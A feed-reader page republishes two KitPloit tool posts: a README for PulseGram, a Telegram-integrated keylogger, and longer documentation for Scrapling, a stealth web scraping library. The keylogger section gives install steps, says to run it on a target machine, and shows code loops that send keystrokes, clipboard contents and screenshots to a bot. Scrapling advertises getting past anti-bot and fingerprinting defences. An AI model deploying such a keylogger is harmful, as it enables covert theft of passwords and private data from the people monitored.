FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
☐ β˜† βœ‡ KitPloit - PenTest Tools!

Pulsegram - Integrated Keylogger With Telegram

By: Unknown β€” April 29th 2025 at 12:30

Integrated keylogger with telegram (1)


PulseGram is a keylogger integrated with a Telegram bot. It is a monitoring tool that captures keystrokes, clipboard content, and screenshots, sending all the information to a configured Telegram bot. It is designed for use in adversary simulations and security testing contexts.

⚠️ Warning: This project is for educational purposes and security testing in authorized environments only. Unauthorized use of this tool may be illegal and is prohibited.

Β 

  _____       _           _____                     
| __ \ | | / ____|
| |__) | _| |___ ___| | __ _ __ __ _ _ __ ___
| ___/ | | | / __|/ _ \ | |_ | '__/ _` | '_ ` _ \
| | | |_| | \__ \ __/ |__| | | | (_| | | | | | |
|_| \__,_|_|___/\___|\_____|_| \__,_|_| |_| |_|

Author: Omar Salazar
Version: V.1.0

Features

  • Keystroke capture: Records keystrokes and sends them to the Telegram bot.
  • Clipboard monitoring: Sends the copied clipboard content in real-time.
  • Periodic screenshots: Takes screenshots and sends them to the bot.
  • Error logs: Logs errors in an errors_log.txt file to facilitate debugging.

Integrated keylogger with telegram (1)

Installation

  1. Clone the repository: bash git clone https://github.com/TaurusOmar/pulsegram cd pulsegram

  2. Install dependencies: Make sure you have Python 3 and pip installed. Then run: bash pip install -r requirements.txt

  3. Set up the Telegram bot token: Create a bot on Telegram using BotFather. Copy your token and paste it into the code in main.py where the bot is initialized.

  4. Copy yout ChatID chat_id="131933xxxx" in keylogger.py

Usage

Run the tool on the target machine with:

python pulsegram.py

Modules

pulsegram.py

This is the main file of the tool, which initializes the bot and launches asynchronous tasks to capture and send data.

Bot(token="..."): Initializes the Telegram bot with your personal token.
asyncio.gather(...): Launches multiple tasks to execute clipboard monitoring, screenshot capture, and keystroke logging.
log_error: In case of errors, logs them in an errors_log.txt file.

helpers.py

This module contains auxiliary functions that assist the overall operation of the tool.

log_error(): Logs any errors in errors_log.txt with a date and time format.
get_clipboard_content(): Captures the current content of the clipboard.
capture_screenshot(): Takes a screenshot and temporarily saves it to send it to the Telegram bot.

keylogger.py

This module handles keylogging, clipboard monitoring, and screenshot captures.

capture_keystrokes(bot): Asynchronous function that captures keystrokes and sends the information to the Telegram bot.
send_keystrokes_to_telegram(bot): This function sends the accumulated keystrokes to the bot.
capture_screenshots(bot): Periodically captures an image of the screen and sends it to the bot.
log_clipboard(bot): Sends the contents of the clipboard to the bot.

Action Configurations

Change the capture and information sending time interval.

async def send_keystrokes_to_telegram(bot):
global keystroke_buffer
while True:
await asyncio.sleep(1) # Change the key sending interval
async def capture_screenshots(bot):
while True:
await asyncio.sleep(30) # Change the screenshot capture interval
try:
async def log_clipboard(bot):
previous_content = ""
while True:
await asyncio.sleep(5) # Change the interval to check for clipboard changes
current_content = get_clipboard_content()

Security Warning

This project is for educational purposes only and for security testing in your own environments or with express authorization. Unauthorized use of this tool may violate local laws and privacy policies.

Contributions

Contributions are welcome. Please ensure to respect the code of conduct when collaborating.

License

This project is licensed under the MIT License.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown β€” April 28th 2025 at 12:30


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • πŸ”„ Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • πŸ” Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling powerful features.

High Performance

  • πŸš€ Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • πŸ”‹ Memory Efficient: Optimized data structures for minimal memory footprint.
  • ⚑ Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • πŸ› οΈ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that takes less memory than standard dictionaries with added methods.
  • πŸ“ Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • πŸ”Œ Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • πŸ“˜ Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

# Library Time (ms) vs Scrapling
1 Scrapling 5.44 1.0x
2 Parsel/Scrapy 5.53 1.017x
3 Raw Lxml 6.76 1.243x
4 PyQuery 21.96 4.037x
5 Selectolax 67.12 12.338x
6 BS4 with Lxml 1307.03 240.263x
7 MechanicalSoup 1322.64 243.132x
8 BS4 with html5lib 3373.75 620.175x

As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.

Extraction By Text Speed Test

Library Time (ms) vs Scrapling
Scrapling 2.51 1.0x
AutoScraper 11.41 4.546x

Scrapling can find elements with more methods and it returns full element Adaptor objects not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; Starting from version 0.2.9, we require at least Python 3.9 to work.

pip3 install scrapling

Then run this command to install browsers' dependencies needed to use Fetcher classes

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single request fashion and then return an Adaptor object. This feature was introduced because the only option we had before was to fetch the page as you wanted it, then pass it manually to the Adaptor class to create an Adaptor instance and start playing around with the page.

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.

[!NOTE] The auto_match argument is enabled by default which is the one you should care about the most as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers which makes Fetcher create and use real browser's headers then create a referer header as if this request came from Google's search of this URL's domain. It's enabled by default. You can also set the number of retries with the argument retries for all methods and this will make httpx retry requests if it failed for any reason. The default number of retries for all Fetcher methods is 3.

Hence: All headers generated by stealthy_headers argument can be overwritten by you through the headers argument

You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For Async requests, you will just replace the import like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

For the sake of simplicity, expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | βœ”οΈ | | block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | βœ”οΈ | | extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | βœ”οΈ | | block_webrtc | Blocks WebRTC entirely. | βœ”οΈ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ | | addons | List of Firefox addons to use. **Must be paths to extracted addons.** | βœ”οΈ | | humanize | Humanize the cursor movement. Takes either True or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | βœ”οΈ | | allow_webgl | Enabled by default. Disabling it WebGL not recommended as many WAFs now checks if WebGL is enabled. | βœ”οΈ | | geoip | Recommended to use with proxies; Automatically use IP's longitude, latitude, timezone, country, locale, & spoof the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | βœ”οΈ | | disable_ads | Disabled by default, this installs `uBlock Origin` addon on the browser if enabled. | βœ”οΈ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | βœ”οΈ | | wait_selector | Wait for a specific css selector to be in a specific state. | βœ”οΈ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ | | os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is Scrapling matching the fingerprints with the current OS. | βœ”οΈ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)

Using this Fetcher class, you can make requests with: 1) Vanilla Playwright without any modifications other than the ones you chose. 2) Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include: * Patching the CDP runtime fingerprint. * Mimics some of the real browsers' properties by injecting several JS files and using custom options. * Using custom flags on launch to hide Playwright even more and make it faster. * Generates real browser's headers of the same type and same user OS then append it to the request's headers. 3) Real browsers by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher and most of the options can be enabled on it. 4) NSTBrowser's docker browserless option by passing the CDP URL and enabling nstbrowser_mode option.

Hence using the real_chrome argument requires that you have Chrome browser installed on your device

Add that to a lot of controlling/hiding options as you will see in the arguments list below.

Expand this for the complete list of arguments | Argument | Description | Optional | |:-------------------:|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------:| | url | Target url | ❌ | | headless | Pass `True` to run the browser in headless/hidden (**default**), or `False` for headful/visible mode. | βœ”οΈ | | disable_resources | Drop requests of unnecessary resources for a speed boost. It depends but it made requests ~25% faster in my tests for some websites.
Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ | | useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate a real Useragent of the same browser and use it.** | βœ”οΈ | | network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ | | timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | βœ”οΈ | | page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ | | wait_selector | Wait for a specific css selector to be in a specific state. | βœ”οΈ | | wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | βœ”οΈ | | google_search | Enabled by default, Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name. | βœ”οΈ | | extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if used together. | βœ”οΈ | | proxy | The proxy to be used with requests, it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ | | hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | βœ”οΈ | | disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | βœ”οΈ | | stealth | Enables stealth mode, always check the documentation to see what stealth mode does currently. | βœ”οΈ | | real_chrome | If you have Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | βœ”οΈ | | locale | Set the locale for the browser if wanted. The default value is `en-US`. | βœ”οΈ | | cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | βœ”οΈ | | nstbrowser_mode | Enables NSTBrowser mode, **it have to be used with `cdp_url` argument or it will get completely ignored.** | βœ”οΈ | | nstbrowser_config | The config you want to send with requests to the NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser's docker browserless config._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
# do something with it...

You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor object as an argument and return True if the condition satisfies or False otherwise like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1' auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.

To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh?Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)

If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain, this is because for Scrapling these are two different URLs, not the website so it isolates their data. To tell Scrapling they are the same website, we then pass the domain we want to use for saving auto-match data for them both so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes: 1. For the two examples above I used one time the Adaptor class and the second time the Fetcher class just to show you that you can create the Adaptor object by yourself if you have the source or fetch the source using any Fetcher class then it will create the Adaptor object for you. 2. Passing the auto_save argument with the auto_match argument set to False while initializing the Adaptor/Fetcher object will only result in ignoring the auto_save argument value and the following warning message text Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. Same case with the auto_match argument.

  1. The auto_match parameter works only for Adaptor instances not Adaptors so if you do something like this you will get an error python page.css('body').css('#p1', auto_match=True) because you can't auto-match a whole list, you have to be specific and do something like python page.css_first('body').css('#p1', auto_match=True)

Find elements by filters

Inspired by BeautifulSoup's find_all function you can find elements by using find_all/find methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.

  • To be more specific:
  • Any string passed is considered a tag name
  • Any iterable passed like List/Tuple/Set is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element(s) attribute names and attribute values.
  • Any regex patterns passed are used as filters to elements by their text content
  • Any functions passed are used as filters
  • Any keyword argument passed is considered as an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements that its text content match all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods but you have to set the identifier by yourself.

  • To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')

  • Now later when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
  • if you want to keep it as lxml.etree object, leave the adaptor_type argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it ) Hence all of these methods are methods from the TextHandler within that contains the text content so the same can be done directly if you call the .text property or equivalent selector function.

  • Doing operations on the text content itself includes

  • Cleaning the text from any white spaces and replacing consecutive spaces with single space python quote.clean()
